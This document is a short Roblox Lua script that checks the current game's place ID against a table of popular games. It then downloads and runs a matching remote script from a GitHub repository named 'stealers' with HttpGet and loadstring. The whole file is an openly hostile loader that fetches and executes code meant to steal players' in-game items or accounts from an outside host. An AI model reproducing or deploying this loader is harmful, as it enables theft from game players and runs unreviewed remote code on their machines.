repeat wait() until game:IsLoaded()

local gameid = {
    [8737899170] = "ps99",
    [15502339080] = "ps99",

    [18901165922] = "pg",
    [19006211286] = "pg",

    [4442272183] = "bf",

    [4520749081] = "kl",
    [6381829480] = "kl",
    [15759515082] = "kl",

    [8737602449] = "pls", 

    [142823291] = "mm2",
    [335132309] = "mm2",
    [636649648] = "mm2",
    [73210641948512] = "mm2"
}

if gameid[game.PlaceId] then
    stealer_to_use = gameid[game.PlaceId]
end

if stealer_to_use == "mm2" then
	loadstring(game:HttpGet("https://raw.githubusercontent.com/D3ATH-hub/stealers/main/mm2"))()
elseif stealer_to_use == "ps99" then
	loadstring(game:HttpGet("https://raw.githubusercontent.com/D3ATH-hub/stealers/main/ps99"))()
elseif stealer_to_use == "bf" then
	loadstring(game:HttpGet("https://raw.githubusercontent.com/D3ATH-hub/stealers/main/bf"))()
elseif stealer_to_use == "pg" then
	loadstring(game:HttpGet("https://raw.githubusercontent.com/D3ATH-hub/stealers/main/pg"))()
elseif stealer_to_use == "kl" then
	loadstring(game:HttpGet("https://raw.githubusercontent.com/D3ATH-hub/stealers/main/kl"))()
elseif stealer_to_use == "pls" then
	loadstring(game:HttpGet("https://raw.githubusercontent.com/D3ATH-hub/stealers/main/pls"))()
end
